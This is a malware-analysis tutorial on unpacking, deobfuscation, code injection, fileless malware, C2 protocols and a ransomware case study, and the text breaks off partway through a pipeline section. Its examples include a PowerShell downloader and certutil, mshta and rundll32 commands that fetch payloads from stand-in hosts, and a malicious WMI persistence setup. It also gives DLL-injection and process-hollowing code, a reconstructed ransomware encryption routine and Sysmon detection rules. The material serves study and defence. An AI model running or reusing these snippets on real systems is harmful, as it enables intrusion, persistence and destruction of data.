Malware Analysis – Lesson 2: Advanced Techniques and Practical Examples
Table of Contents
- Advanced Static Analysis: Unpacking and Deobfuscation
- Reverse Engineering Cryptographic Functions
- Advanced Dynamic Analysis: Code Injection Techniques
- Analyzing Fileless Malware
- C2 Communication Protocol Reverse Engineering
- Practical Case Study: Ransomware Analysis
- Automated Analysis Pipeline Development
- Advanced Persistence Mechanism Analysis
- Mobile Malware Analysis Fundamentals
- Threat Hunting with Analysis Results
1. Advanced Static Analysis: Unpacking and Deobfuscation
Understanding Packers
Packers compress and encrypt executable files to evade detection and analysis. Common packers include UPX, Themida, VMProtect, and custom packers.
Identifying Packed Executables:
1. Entropy Analysis:
# Python script to calculate section entropy
import math
import pefile
def calculate_entropy(data):
    """Shannon entropy of a byte string, in bits per byte (0.0 to 8.0)."""
    if not data:
        return 0.0
    entropy = 0.0
    for x in range(256):
        p_x = data.count(x) / len(data)
        if p_x > 0:
            entropy -= p_x * math.log2(p_x)
    return entropy
pe = pefile.PE('packed_malware.exe')
for section in pe.sections:
    # Section names are NUL-padded to 8 bytes and may not be valid UTF-8
    name = section.Name.rstrip(b'\x00').decode(errors='replace')
    entropy = calculate_entropy(section.get_data())
    print(f"{name}: {entropy:.2f}")
- Entropy above 7.0 (out of a maximum of 8.0 bits per byte) often indicates compression or encryption
2. Section Characteristics:
- Small .text section with large .data or custom sections
- Unusual section names
- Write + Execute permissions on sections
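The write-plus-execute check can be expressed directly on the section characteristics field. The following is a minimal sketch, assuming the sections have already been read into (name, characteristics) pairs, for example from pefile's `section.Name` and `section.Characteristics`. The helper names `is_write_execute` and `flag_sections` are hypothetical; the flag values come from the PE/COFF format.

```python
# PE section characteristic flags (values defined by the PE/COFF format)
IMAGE_SCN_MEM_EXECUTE = 0x20000000
IMAGE_SCN_MEM_WRITE = 0x80000000


def is_write_execute(characteristics: int) -> bool:
    """Return True when a section is both writable and executable."""
    wx = IMAGE_SCN_MEM_EXECUTE | IMAGE_SCN_MEM_WRITE
    return characteristics & wx == wx


def flag_sections(sections):
    """Return the names of W+X sections.

    sections: iterable of (name, characteristics) pairs (hypothetical input shape).
    """
    return [name for name, characteristics in sections
            if is_write_execute(characteristics)]


if __name__ == "__main__":
    sample = [(".text", 0x60000020), ("UPX0", 0xE0000080)]
    print(flag_sections(sample))
```

A W+X section is only a hint: some legitimate software (JIT compilers, installers) also uses it, so this check works best combined with the entropy and section-name indicators.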
Manual Unpacking Techniques
Step-by-Step UPX Unpacking:
1. Load in x64dbg (use the x32dbg build for 32-bit samples, such as the PUSHAD/POPAD stub in step 3):
- Open the packed executable
- Navigate to entry point (F9 to run to entry point)
2. Find OEP (Original Entry Point):
Common techniques:
- ESP tracking method
- Jump to OEP pattern (JMP or PUSH/RET)
- Memory breakpoints on section access
3. ESP Tracking Method:
; At entry point
PUSHAD ; Save all registers
; ... unpacking code ...
POPAD ; Restore registers
JMP original_entry_point ; Jump to OEP
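- Step over PUSHAD, then set a hardware breakpoint on access at the stack address ESP now points to
- Run until the breakpoint hits, which happens when POPAD reads the saved registers back
- Step until the JMP to OEP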
4. Dumping Unpacked Code:
- Use Scylla plugin in x64dbg
- Dump process at OEP
- Fix Import Address Table (IAT)
Advanced Deobfuscation
Control Flow Flattening:
Original code:
if (condition) {
    actionA();
} else {
    actionB();
}
Obfuscated:
state = 1;
while (1) {
    switch (state) {
    case 1:
        if (condition) state = 2;
        else state = 3;
        break;
    case 2:
        actionA();
        state = 4;
        break;
    case 3:
        actionB();
        state = 4;
        break;
    case 4:
        return;
    }
}
Deobfuscation Approach:
- Identify dispatcher loop
- Trace execution flow
- Reconstruct original control flow
- Use IDA Python scripts for automation
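Once the dispatcher's state transitions have been traced, reconstructing the control flow is a graph problem. The following is a minimal sketch, assuming the transitions were already recorded as a dictionary mapping each state value to the states it can assign next (the values below mirror the flattened example above). The function name `rebuild_flow` and the input shape are hypothetical, not part of any IDA API.

```python
def rebuild_flow(transitions, entry):
    """Walk recorded state transitions and recover the original flow graph.

    transitions: dict mapping a state to the list of states it can set next.
    Returns (edges, branch_states, join_states).
    """
    edges, seen, stack = [], set(), [entry]
    while stack:
        state = stack.pop()
        if state in seen:
            continue
        seen.add(state)
        for nxt in transitions.get(state, []):
            edges.append((state, nxt))
            stack.append(nxt)

    # A state with several successors was a conditional branch in the original code
    branches = sorted(s for s in seen if len(transitions.get(s, [])) > 1)

    # A state with several predecessors is a merge point (end of an if/else)
    preds = {}
    for src, dst in edges:
        preds.setdefault(dst, set()).add(src)
    joins = sorted(s for s, p in preds.items() if len(p) > 1)
    return sorted(edges), branches, joins


if __name__ == "__main__":
    # Transitions taken from the flattened switch shown above
    recorded = {1: [2, 3], 2: [4], 3: [4], 4: []}
    print(rebuild_flow(recorded, entry=1))
```

For the example, state 1 is reported as the branch and state 4 as the join, which matches the original if/else.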
String Deobfuscation
Common String Obfuscation:
1. XOR Encryption:
# IDA Python script to decrypt XOR strings
import idc
def xor_decrypt(encrypted, key):
    # XOR each byte with the repeating key
    decrypted = []
    for i, byte in enumerate(encrypted):
        decrypted.append(chr(byte ^ key[i % len(key)]))
    return ''.join(decrypted)
# Read the encrypted bytes at the current cursor position
ea = idc.get_screen_ea()
encrypted_data = idc.get_bytes(ea, 50)  # 50 is a placeholder length
key = [0x41, 0x42, 0x43]  # Found through analysis
print(xor_decrypt(encrypted_data, key))
2. Stack Strings:
; Building strings on stack (immediates are stored little-endian)
mov dword ptr [esp], 70747468h   ; "http"
mov dword ptr [esp+4], 002F2F3Ah ; "://" plus NUL terminator
; Results in "http://"
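Stack strings can be recovered offline by packing the immediates back into bytes. This is a small sketch, assuming the immediates are 32-bit values written to consecutive 4-byte stack slots in little-endian order; `decode_stack_string` is a hypothetical helper name.

```python
import struct


def decode_stack_string(immediates):
    """Rebuild a string from 32-bit immediates written to consecutive stack slots."""
    # '<I' packs each value as a little-endian unsigned 32-bit integer
    raw = b''.join(struct.pack('<I', imm) for imm in immediates)
    # Stop at the first NUL terminator
    return raw.split(b'\x00', 1)[0].decode('ascii', errors='replace')


if __name__ == "__main__":
    # 0x70747468 -> "http", 0x002F2F3A -> "://" followed by NUL
    print(decode_stack_string([0x70747468, 0x002F2F3A]))
```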
2. Reverse Engineering Cryptographic Functions
Identifying Cryptographic Operations
Common Crypto Constants:
# AES S-box first values
AES_SBOX = [0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5]
# MD5 initialization values
MD5_INIT = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
# RC4 key scheduling
RC4_PATTERN = "mov byte ptr [ecx+eax], dl"
IDA Pro FLIRT Signatures:
- Apply crypto library signatures
- Identify standard implementations
- Look for custom modifications
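A constant search over a raw dump can be sketched in a few lines. It assumes the constants are stored contiguously as a table; MD5 initialization values are often encoded as separate instruction immediates instead, in which case a byte search will miss them. Note also that SHA-1 starts with the same four values as MD5. The names `SIGNATURES` and `find_crypto_constants` are hypothetical.

```python
import struct

# Byte signatures built from the constants listed above
SIGNATURES = {
    "AES S-box": bytes([0x63, 0x7C, 0x77, 0x7B, 0xF2, 0x6B, 0x6F, 0xC5]),
    # Little-endian layout, as it would appear in an x86 data table
    "MD5 init": struct.pack('<4I', 0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476),
}


def find_crypto_constants(blob: bytes):
    """Return {signature name: [offsets]} for every signature found in blob."""
    hits = {}
    for name, sig in SIGNATURES.items():
        offsets = []
        pos = blob.find(sig)
        while pos != -1:
            offsets.append(pos)
            pos = blob.find(sig, pos + 1)
        if offsets:
            hits[name] = offsets
    return hits


if __name__ == "__main__":
    dump = b'\x00' * 10 + SIGNATURES["AES S-box"] + b'\xff' * 5
    print(find_crypto_constants(dump))
```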
Analyzing Custom Crypto
Step-by-Step RC4 Analysis:
1. Key Scheduling Algorithm (KSA):
// Identify this pattern in assembly
for (i = 0; i < 256; i++) {
    S[i] = i;
}
j = 0;
for (i = 0; i < 256; i++) {
    j = (j + S[i] + key[i % keylen]) % 256;
    swap(S[i], S[j]);
}
2. Pseudo-Random Generation Algorithm (PRGA):
i = j = 0;
while (generating_output) {
    i = (i + 1) % 256;
    j = (j + S[i]) % 256;
    swap(S[i], S[j]);
    K = S[(S[i] + S[j]) % 256];
    output = input ^ K;
}
3. Extracting Keys:
- Set breakpoints at crypto functions
- Dump memory containing key material
- Trace key derivation functions
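Once a key has been recovered, a reference RC4 implementation is useful for confirming that a routine really is unmodified RC4: if the output differs from what the sample produces, the malware author has probably altered the algorithm. The sketch below follows the KSA and PRGA steps above; the function name `rc4` is our own.

```python
def rc4(key: bytes, data: bytes) -> bytes:
    """Standard RC4: encrypts or decrypts data (the operation is symmetric)."""
    # Key Scheduling Algorithm (KSA)
    S = list(range(256))
    j = 0
    for i in range(256):
        j = (j + S[i] + key[i % len(key)]) % 256
        S[i], S[j] = S[j], S[i]

    # Pseudo-Random Generation Algorithm (PRGA)
    i = j = 0
    out = bytearray()
    for byte in data:
        i = (i + 1) % 256
        j = (j + S[i]) % 256
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) % 256])
    return bytes(out)


if __name__ == "__main__":
    # Widely published RC4 test vector
    print(rc4(b"Key", b"Plaintext").hex())  # bbf316e8d940af0ad3
```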
Practical Decryption Example
Ransomware Configuration Decryption:
# Found through reverse engineering (requires PyCryptodome)
import json
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
def decrypt_config(encrypted_config):
    # Key found in binary at offset 0x4A300
    key = b'\x11\x22\x33\x44' * 4  # 16 bytes for AES-128
    iv = b'\x00' * 16  # Often zeros or hardcoded
    cipher = AES.new(key, AES.MODE_CBC, iv)
    decrypted = cipher.decrypt(encrypted_config)
    # Remove PKCS7 padding
    config = unpad(decrypted, AES.block_size)
    return config
# Extract C2 servers from decrypted config
# encrypted_blob holds the encrypted configuration bytes carved from the sample
config_data = decrypt_config(encrypted_blob)
config = json.loads(config_data)
print("C2 Servers:", config['c2_servers'])
print("Encryption Key:", config['file_encryption_key'])
3. Advanced Dynamic Analysis: Code Injection Techniques
Process Injection Methods
1. Classic DLL Injection:
// Injection code pattern
HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, targetPID);
LPVOID pRemoteBuffer = VirtualAllocEx(hProcess, NULL, dllPathSize,
MEM_COMMIT, PAGE_READWRITE);
WriteProcessMemory(hProcess, pRemoteBuffer, dllPath, dllPathSize, NULL);
HMODULE hKernel32 = GetModuleHandle("kernel32.dll");
LPVOID pLoadLibrary = GetProcAddress(hKernel32, "LoadLibraryA");
CreateRemoteThread(hProcess, NULL, 0, pLoadLibrary, pRemoteBuffer, 0, NULL);
Monitoring with WinAPIOverride:
- Attach to target process
- Monitor for:
- OpenProcess calls
- VirtualAllocEx allocations
- WriteProcessMemory operations
- CreateRemoteThread creation
2. Process Hollowing:
; Typical hollowing sequence
CreateProcess(..., CREATE_SUSPENDED, ...)
GetThreadContext(hThread, &context)
ReadProcessMemory(...) ; Read headers
NtUnmapViewOfSection(hProcess, pImageBase)
VirtualAllocEx(hProcess, pImageBase, ...)
WriteProcessMemory(...) ; Write malicious PE
SetThreadContext(hThread, &context)
ResumeThread(hThread)
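When an API monitor or sandbox produces an ordered call log, the hollowing sequence can be matched as an ordered subsequence. This is a sketch only: the log format (a flat list of API names for one process) and the names `HOLLOWING_SEQUENCE` and `contains_in_order` are assumptions, and real logs usually need filtering by process and handle first.

```python
# Core steps of the hollowing sequence listed above
HOLLOWING_SEQUENCE = [
    "CreateProcess",          # prefix match also covers CreateProcessA/W
    "NtUnmapViewOfSection",
    "VirtualAllocEx",
    "WriteProcessMemory",
    "SetThreadContext",
    "ResumeThread",
]


def contains_in_order(calls, pattern=HOLLOWING_SEQUENCE):
    """True if every pattern step appears in calls, in order (gaps allowed)."""
    remaining = iter(calls)
    # Each any() consumes the shared iterator up to the next matching call,
    # so later steps can only match calls that come after earlier ones
    return all(any(call.startswith(step) for call in remaining)
               for step in pattern)


if __name__ == "__main__":
    log = ["CreateProcessW", "GetThreadContext", "ReadProcessMemory",
           "NtUnmapViewOfSection", "VirtualAllocEx", "WriteProcessMemory",
           "WriteProcessMemory", "SetThreadContext", "ResumeThread"]
    print(contains_in_order(log))
```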
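Detection in Sysmon:
<!-- Sysmon config for process hollowing detection -->
<!-- CREATE_SUSPENDED is a process creation flag, not part of the command line, so a ProcessCreate rule cannot match it. Sysmon 13 and later report image replacement as ProcessTampering (Event ID 25); an empty exclude rule logs every such event. -->
<ProcessTampering onmatch="exclude" />
<!-- Full-access handle requests: 0x1FFFFF is PROCESS_ALL_ACCESS on Vista and later, 0x1F0FFF the older value -->
<ProcessAccess onmatch="include">
  <GrantedAccess condition="is">0x1FFFFF</GrantedAccess>
  <GrantedAccess condition="is">0x1F0FFF</GrantedAccess>
</ProcessAccess>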
Advanced Injection Techniques
3. AtomBombing:
// Atom table injection
GlobalAddAtom(shellcode_chunk);
// Force target to access atom table
NtQueueApcThread(hThread, GlobalGetAtomName, ...)
4. SetWindowsHookEx Injection:
Monitoring approach:
# Volatility plugin to detect hooks
volatility -f memory.dmp --profile=Win10x64 messagehooks
# List kernel notification callbacks (a separate check, useful for spotting rootkit components)
volatility -f memory.dmp --profile=Win10x64 callbacks
Shellcode Analysis
Extracting Injected Code:
1. Process Memory Dump:
# Using Process Hacker
1. Right-click on process
2. Properties -> Memory
3. Find RWX regions
4. Save selected region
2. Shellcode Emulation:
# Using Unicorn Engine
from unicorn import *
from unicorn.x86_const import *
def emulate_shellcode(shellcode):
    mu = Uc(UC_ARCH_X86, UC_MODE_32)
    # Map 2 MB of memory and load the shellcode at its base
    base = 0x1000000
    mu.mem_map(base, 2 * 1024 * 1024)
    mu.mem_write(base, shellcode)
    # Set up the stack in the middle of the mapped region so that
    # both pushes and reads above ESP stay inside mapped memory
    mu.reg_write(UC_X86_REG_ESP, base + 0x100000)
    # Trace every executed instruction (API calls need separate handling)
    def hook_code(uc, address, size, user_data):
        print(f"Executing: 0x{address:x}")
    mu.hook_add(UC_HOOK_CODE, hook_code)
    # Start emulation
    mu.emu_start(base, base + len(shellcode))
4. Analyzing Fileless Malware
PowerShell-Based Threats
Deobfuscating PowerShell:
1. Common Obfuscation Patterns:
# Obfuscated
${`e`x`e`c} = &('n'+'ew-ob'+'ject') NeT.WeBcLiEnT
${d`o`w`n} = ${`e`x`e`c}."d`o`w`N`l`o`A`d`S`t`R`i`n`g"('ht'+'tp://c2.com/payload')
# Deobfuscated
$exec = New-Object Net.WebClient
$down = $exec.DownloadString('http://c2.com/payload')
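The two patterns in this example, backtick insertion and string concatenation, can be undone with simple text rewriting. This is a rough sketch with a hypothetical function name: it does not parse PowerShell, and it will also strip backticks that form real escape sequences inside double-quoted strings (such as a backtick followed by n or t), so the output should be reviewed by hand.

```python
import re

# Matches two adjacent single-quoted literals joined by '+'
_CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")


def simplify_powershell(script: str) -> str:
    """Undo backtick insertion and single-quoted string concatenation."""
    # Drop backticks placed in front of ordinary letters
    script = re.sub(r'`(?=[A-Za-z])', '', script)
    # Merge 'a'+'b' into 'ab' until nothing changes
    while True:
        merged = _CONCAT.sub(r"'\1\2'", script)
        if merged == script:
            return merged
        script = merged


if __name__ == "__main__":
    print(simplify_powershell("&('n'+'ew-ob'+'ject') NeT.WeBcLiEnT"))
```

Case randomization (NeT.WeBcLiEnT) is left untouched because PowerShell is case-insensitive; normalize it only for display.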
2. PowerShell Logging:
# Enable transcript logging
Start-Transcript -Path "C:\Analysis\ps_log.txt" -Append
# Enable script block logging via Group Policy
Computer Configuration > Policies > Administrative Templates >
Windows Components > Windows PowerShell > Turn on PowerShell Script Block Logging
3. Memory Analysis of PowerShell:
# Volatility command to extract PowerShell history
volatility -f memory.dmp --profile=Win10x64 consoles
# Extract .NET assemblies from memory (dumpdotnet is not a core Volatility plugin; this assumes a third-party plugin is installed)
volatility -f memory.dmp --profile=Win10x64 dumpdotnet -D output/
WMI-Based Persistence
Detecting WMI Implants:
1. Query WMI Repository:
# List all WMI Event Filters
Get-WMIObject -Namespace root\subscription -Class __EventFilter
# List Event Consumers
Get-WMIObject -Namespace root\subscription -Class __EventConsumer
# List Bindings
Get-WMIObject -Namespace root\subscription -Class __FilterToConsumerBinding
2. Malicious WMI Example:
# Malicious Event Filter (triggers every 60 seconds)
$Filter = Set-WmiInstance -Namespace "root\subscription" -Class __EventFilter -Arguments @{
Name = "MaliciousFilter"
EventNameSpace = "root\cimv2"
QueryLanguage = "WQL"
Query = "SELECT * FROM __InstanceModificationEvent WITHIN 60 WHERE TargetInstance ISA 'Win32_LocalTime'"
}
# CommandLineEventConsumer (executes PowerShell)
$Consumer = Set-WmiInstance -Namespace "root\subscription" -Class CommandLineEventConsumer -Arguments @{
Name = "MaliciousConsumer"
CommandLineTemplate = "powershell.exe -NoP -W Hidden -Enc <base64_payload>"
}
Living-off-the-Land Techniques
Analyzing LOLBins Usage:
1. Common LOLBins Patterns:
# Downloading with certutil
certutil.exe -urlcache -split -f http://malicious.com/payload.exe
# Execution via mshta
mshta.exe javascript:close(new ActiveXObject('WScript.Shell').Run('powershell -enc <payload>'))
# Script execution via rundll32 (abuses the RunHTMLApplication export of mshtml)
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("malicious_code")
2. Detection Strategy:
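<!-- Sysmon rule for LOLBin detection -->
<!-- "contains all" matches when every semicolon-separated term is present, so the rule still fires when the binary is invoked as certutil.exe or with a full path -->
<ProcessCreate onmatch="include">
  <CommandLine condition="contains all">certutil;-urlcache</CommandLine>
  <CommandLine condition="contains all">mshta;javascript:</CommandLine>
  <CommandLine condition="contains all">rundll32;javascript:</CommandLine>
</ProcessCreate>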
5. C2 Communication Protocol Reverse Engineering
HTTP/HTTPS C2 Analysis
Dissecting C2 Protocols:
1. Custom HTTP Headers:
POST /api/beacon HTTP/1.1
Host: legitimate-site.com
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0)
X-Session-ID: AES256(victim_id + timestamp)
X-Request-Type: beacon
Cookie: session=BASE64(encrypted_data)
ENCRYPTED_PAYLOAD_DATA
2. Protocol Reverse Engineering Steps:
- Capture multiple communication sessions
- Identify patterns in headers/data
- Correlate with binary analysis
- Decrypt/decode payloads
DNS Tunneling Analysis
Identifying DNS C2:
1. Suspicious DNS Patterns:
# Wireshark display filter
dns.qry.name matches "^[a-f0-9]{32}\\." and dns.qry.type == 1
# Example DNS tunneling query
# 61626364656667686970717273747576.malicious-c2.com
# Decoded: "abcdefghipqrstuv" (data exfiltration)
2. Decoding DNS Tunneling:
def decode_dns_tunnel(queries):
    """Reassemble hex-encoded data carried in the first label of each query name."""
    data = b''
    for query in queries:
        subdomain = query.split('.')[0]
        # Common encoding: hex
        chunk = bytes.fromhex(subdomain)
        data += chunk
    # The result may still need decryption or decompression, depending on the sample
    return data
Custom Binary Protocols
Reverse Engineering Binary C2:
1. Protocol Structure Analysis:
struct C2_Packet {
uint32_t magic; // 0xDEADBEEF
uint16_t packet_type; // Command type
uint16_t packet_length; // Data length
uint32_t session_id; // Victim identifier
uint8_t encrypted_data[]; // AES encrypted payload
};
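The same header layout can be parsed from captured payload bytes for quick triage outside Wireshark. This sketch assumes big-endian (network) byte order and that packet_length counts only the encrypted payload; neither is stated in the structure above, so both should be verified against the binary. `parse_c2_packet` is a hypothetical helper.

```python
import struct

# magic (u32), packet_type (u16), packet_length (u16), session_id (u32)
# '>' = big-endian, an assumption to verify against the sample
HEADER = struct.Struct('>IHHI')
MAGIC = 0xDEADBEEF


def parse_c2_packet(raw: bytes) -> dict:
    """Split one packet into header fields and the still-encrypted payload."""
    if len(raw) < HEADER.size:
        raise ValueError("packet shorter than 12-byte header")
    magic, packet_type, length, session_id = HEADER.unpack_from(raw)
    if magic != MAGIC:
        raise ValueError(f"unexpected magic 0x{magic:08X}")
    payload = raw[HEADER.size:HEADER.size + length]
    if len(payload) != length:
        raise ValueError("truncated payload")
    return {"type": packet_type, "session_id": session_id, "payload": payload}


if __name__ == "__main__":
    sample = struct.pack('>IHHI', MAGIC, 1, 4, 0x1234) + b'ABCD'
    print(parse_c2_packet(sample))
```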
2. Creating Protocol Dissector:
-- Wireshark Lua dissector
local c2_proto = Proto("c2", "Custom C2 Protocol")
local f_magic = ProtoField.uint32("c2.magic", "Magic", base.HEX)
local f_type = ProtoField.uint16("c2.type", "Type", base.DEC)
local f_length = ProtoField.uint16("c2.length", "Length", base.DEC)
local f_session = ProtoField.uint32("c2.session", "Session ID", base.HEX)
c2_proto.fields = {f_magic, f_type, f_length, f_session}
function c2_proto.dissector(buffer, pinfo, tree)
    -- Skip segments too short to hold the 12-byte header
    if buffer:len() < 12 then return end
    pinfo.cols.protocol = "C2"
    local subtree = tree:add(c2_proto, buffer(), "C2 Protocol")
    subtree:add(f_magic, buffer(0,4))
    subtree:add(f_type, buffer(4,2))
    subtree:add(f_length, buffer(6,2))
    subtree:add(f_session, buffer(8,4))
end
-- Register the dissector for the port observed in captures
local tcp_table = DissectorTable.get("tcp.port")
tcp_table:add(8443, c2_proto)
6. Practical Case Study: Ransomware Analysis
Initial Triage
Sample: CryptoLocker Variant
1. Static Properties:
SHA256: a1b2c3d4e5f6789...
File Type: PE32 executable
Compile Time: 2024-01-15 08:30:00
Packer: UPX 3.96
2. Behavioral Summary:
- Terminates shadow copies
- Encrypts files with .locked extension
- Drops ransom note: DECRYPT_INSTRUCTIONS.txt
- Communicates with Tor hidden service
Detailed Analysis Workflow
Step 1: Unpacking
; UPX unpacking stub at the packed entry point (ends with the jump to OEP)
0x00401000: PUSHAD
0x00401001: MOV ESI, 0x00409000 ; Packed data
0x00401006: MOV EDI, 0x00401000 ; Destination
...
0x00401150: POPAD
0x00401151: JMP 0x004A5000 ; Original Entry Point
Step 2: Encryption Routine Analysis
// Reconstructed from assembly
void encrypt_file(char* filename) {
FILE* file = fopen(filename, "rb");
if (!file) return;
// Generate unique file key
unsigned char file_key[32];
CryptGenRandom(hProv, 32, file_key);
// Encrypt file key with RSA public key
unsigned char encrypted_key[256];
RSA_public_encrypt(32, file_key, encrypted_key, rsa_public, RSA_PKCS1_OAEP_PADDING);
// Read file content
fseek(file, 0, SEEK_END);
long file_size = ftell(file);
fseek(file, 0, SEEK_SET);
unsigned char* buffer = malloc(file_size);
fread(buffer, 1, file_size, file);
fclose(file);
// AES-256 CBC encryption
AES_KEY aes_key;
AES_set_encrypt_key(file_key, 256, &aes_key);
unsigned char iv[16] = {0};
AES_cbc_encrypt(buffer, buffer, file_size, &aes_key, iv, AES_ENCRYPT);
// Write encrypted file
char new_filename[MAX_PATH];
sprintf(new_filename, "%s.locked", filename);
file = fopen(new_filename, "wb");
// File structure: [RSA_encrypted_key][AES_encrypted_data]
fwrite(encrypted_key, 1, 256, file);
fwrite(buffer, 1, file_size, file);
fclose(file);
// Delete original
DeleteFile(filename);
}
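The file structure noted in the reconstructed routine, a 256-byte RSA-encrypted key followed by the AES-encrypted data, can be split apart for triage. This is a minimal sketch working on bytes already read from a .locked file; `split_locked_file` and `RSA_BLOB_SIZE` are hypothetical names. Decrypting the key blob still requires the attacker's RSA private key.

```python
# Size of the RSA-encrypted key blob, per the fwrite(encrypted_key, 1, 256, ...) call above
RSA_BLOB_SIZE = 256


def split_locked_file(blob: bytes):
    """Split a .locked file into (rsa_encrypted_key, aes_encrypted_data)."""
    if len(blob) < RSA_BLOB_SIZE:
        raise ValueError("file too small to contain the 256-byte key blob")
    return blob[:RSA_BLOB_SIZE], blob[RSA_BLOB_SIZE:]


if __name__ == "__main__":
    fake = bytes(range(256)) + b"ciphertext-bytes"
    key_blob, body = split_locked_file(fake)
    print(len(key_blob), len(body))
```

Comparing key blobs across several encrypted files is a quick check: identical blobs would mean the per-file key is being reused.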
Step 3: Kill Switch Discovery
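# IDA Python script to find kill switch
import idautils
import idc
# Search for mutex creation
mutex_refs = []
for xref in idautils.XrefsTo(idc.get_name_ea_simple("CreateMutexW")):
    mutex_refs.append(xref.frm)
# Analyze mutex names
for ref in mutex_refs:
    # Walk back a few instructions to find the PUSH of the mutex name (lpName).
    # Assumes a 32-bit stdcall call site that pushes the string address as an immediate.
    ea = ref
    for _ in range(6):
        ea = idc.prev_head(ea)
        if idc.print_insn_mnem(ea) == "push" and idc.get_operand_type(ea, 0) == idc.o_imm:
            mutex_name_addr = idc.get_operand_value(ea, 0)
            mutex_name = idc.get_strlit_contents(mutex_name_addr, -1, idc.STRTYPE_C_16)
            if mutex_name:
                print(f"Mutex: {mutex_name.decode(errors='replace')}")
                break
# Found: Global\MsCryptoLockerKillSwitch2024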
Step 4: C2 Communication
# Extracted Tor configuration
TOR_HIDDEN_SERVICE = "cryptolocker2024xxxxxxxxx.onion"
BITCOIN_ADDRESS = "1A1zP1eP5QGefi2DMPTfTL5SLmv7DivfNa"
# Communication protocol
def send_infection_report(victim_id, encrypted_files_count):
data = {
"victim_id": victim_id,
"timestamp": time.time(),
"files_encrypted": encrypted_files_count,
"bitcoin_address": BITCOIN_ADDRESS,
"system_info": get_system_info()
}
# Send via Tor
session = requests.Session()
session.proxies = {'http': 'socks5h://localhost:9050',
'https': 'socks5h://localhost:9050'}
response = session.post(f"http://{TOR_HIDDEN_SERVICE}/report",
json=data, timeout=30)
Recovery and Mitigation
File Recovery Attempts:
1. Check for Encryption Flaws:
# Analyze encryption implementation
# Found: IV reuse vulnerability in early versions
def attempt_recovery(encrypted_file):
# If same IV used for multiple files
# Known plaintext attack possible
pass
2. Shadow Copy Recovery:
vssadmin list shadows
# If ransomware failed to delete all shadows
mklink /d C:\ShadowRestore \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\
7. Automated Analysis Pipeline Development
Building an Analysis Framework
Architecture Overview:
# analysis_pipeline.py
import os
import hashlib
from datetime import datetime, timezone
import pefile
import requests
class MalwareAnalysisPipeline:
    # extract_strings, run_yara_rules, and extract_imports are helper
    # methods that still need to be implemented
    def __init__(self, sample_path):
        self.sample_path = sample_path
        self.sample_hash = self.calculate_hash()
        self.results = {
            "hash": self.sample_hash,
            "timestamp": datetime.now().isoformat(),
            "static_analysis": {},
            "dynamic_analysis": {},
            "network_analysis": {},
            "verdict": "unknown"
        }
    def calculate_hash(self):
        # Hash in 4 KB blocks so large samples are not loaded into memory at once
        sha256_hash = hashlib.sha256()
        with open(self.sample_path, "rb") as f:
            for byte_block in iter(lambda: f.read(4096), b""):
                sha256_hash.update(byte_block)
        return sha256_hash.hexdigest()
    def run_static_analysis(self):
        # PE analysis
        pe_info = self.analyze_pe_structure()
        self.results["static_analysis"]["pe_info"] = pe_info
        # String extraction
        strings = self.extract_strings()
        self.results["static_analysis"]["strings"] = strings
        # YARA scanning
        yara_matches = self.run_yara_rules()
        self.results["static_analysis"]["yara_matches"] = yara_matches
    def run_dynamic_analysis(self):
        # Sandbox execution
        sandbox_report = self.execute_in_sandbox()
        self.results["dynamic_analysis"] = sandbox_report
    def analyze_pe_structure(self):
        # Using pefile
        pe = pefile.PE(self.sample_path)
        return {
            "imphash": pe.get_imphash(),
            # PE timestamps are seconds since the epoch in UTC
            "compile_time": datetime.fromtimestamp(
                pe.FILE_HEADER.TimeDateStamp, tz=timezone.utc).isoformat(),
            "sections": [
                {
                    "name": section.Name.rstrip(b'\x00').decode(errors='replace'),
                    "virtual_size": section.Misc_VirtualSize,
                    "raw_size": section.SizeOfRawData,
                    "entropy": section.get_entropy()
                }
                for section in pe.sections
            ],
            "imports": self.extract_imports(pe)
        }
    def execute_in_sandbox(self):
        # Cuckoo Sandbox integration through its REST API. Assumes the API
        # server listens on localhost:8090 and that the API token is in the
        # CUCKOO_API_TOKEN environment variable (a name chosen for this example).
        api = "http://localhost:8090"
        headers = {"Authorization": f"Bearer {os.environ.get('CUCKOO_API_TOKEN', '')}"}
        with open(self.sample_path, "rb") as f:
            response = requests.post(f"{api}/tasks/create/file",
                                     headers=headers, files={"file": f})
        task_id = response.json()["task_id"]
        # Wait for analysis completion
        # ... (implement polling logic against /tasks/view/<task_id>)
        # Retrieve report
        report = requests.get(f"{api}/tasks/report/{task_id}", headers=headers)
        return report.json()
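The pipeline calls a string-extraction helper without showing it. One possible standalone version is sketched below, assuming the goal is the usual printable ASCII and UTF-16LE runs that the `strings` utility reports. The function signature and the default minimum length of 4 are our choices, not something the pipeline prescribes.

```python
import re


def extract_strings(data: bytes, min_len: int = 4):
    """Return printable ASCII and UTF-16LE strings of at least min_len characters."""
    # Runs of printable ASCII bytes
    ascii_re = re.compile(rb'[\x20-\x7e]{%d,}' % min_len)
    # Runs of printable ASCII characters each followed by a NUL byte (UTF-16LE)
    utf16_re = re.compile(rb'(?:[\x20-\x7e]\x00){%d,}' % min_len)
    found = [m.group().decode('ascii') for m in ascii_re.finditer(data)]
    found += [m.group().decode('utf-16-le') for m in utf16_re.finditer(data)]
    return found


if __name__ == "__main__":
    blob = (b'\x01\x02http://c2.example\x00\xff\xfe'
            + 'cmd.exe'.encode('utf-16-le') + b'\x00\x00')
    print(extract_strings(blob))
```

Inside the class this would be wrapped in a method that reads `self.sample_path` and passes the bytes through.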
Integration with Threat Intelligence
Threat Intel Enrichment:
class ThreatIntelligence:
    def __init__(self, api_keys):
        self.vt_api_key = api_keys.get('virustotal')
        self.otx_api_key = api_keys.get('alienvault_otx')
        self.misp_url = api_keys.get('misp_url')
        self.misp_key = api_keys.get('misp_key')
    def check_virustotal(self, file_hash):
        import requests
        headers = {"x-apikey": self.vt_api_key}
        url = f"https://www.virustotal.com/api/v3/files/{file_hash}"
        response = requests.get(url, headers=headers, timeout=30)
        if response.status_code == 200:
            attributes = response.json()["data"]["attributes"]
            return {
                "detections": attributes["last_analysis_stats"],
                "names": attributes["names"],
